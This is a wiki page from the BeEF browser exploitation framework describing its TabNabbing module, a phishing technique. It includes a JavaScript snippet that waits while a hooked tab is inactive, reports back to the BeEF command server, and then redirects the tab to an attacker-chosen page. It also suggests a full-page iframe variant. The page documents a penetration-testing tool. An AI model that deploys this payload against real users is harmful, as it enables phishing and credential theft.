-
Notifications
You must be signed in to change notification settings - Fork 2.2k
Module: TabNabbing
Jess Williams edited this page Dec 31, 2019
·
6 revisions
- Objective: This module redirects to the specified URL after the tab has been inactive for a specified amount of time.
- Authors: bcoles
- Browsers: 1ll
-
Parameters :
- URL : URL for the redirection
- Wait : Time before redirecting (in minutes)
- Code
Internal workig is pretty easy : when the tab loose focus, it starts a timer. When the timer ends the browser is redirected to the given URL :
window.onblur = function() {
begin_countdown();
}
window.onfocus = function() {
clearTimeout(tabnab_timer);
}
begin_countdown = function() {
tabnab_timer = setTimeout(function() { beef.net.send('<%= @command_url %>', <%= @command_id %>, 'tabnab=redirected'); window.location = url; }, wait);
}
- One improvement may be to replace the redirection by a 100% iframe.
- It should be noticed that the time given is in minute which may be long regarding average of web sessions
- Tabnabbing: A New Type of Phishing Attack by Aza Raskin
- Configuration
- Interface
- Information Gathering
- Social Engineering
- Network Discovery
- Metasploit
- Tunneling
- XSS Rays
- Persistence
- Creating a Module
- Geolocation
- Using-BeEF-With-NGROK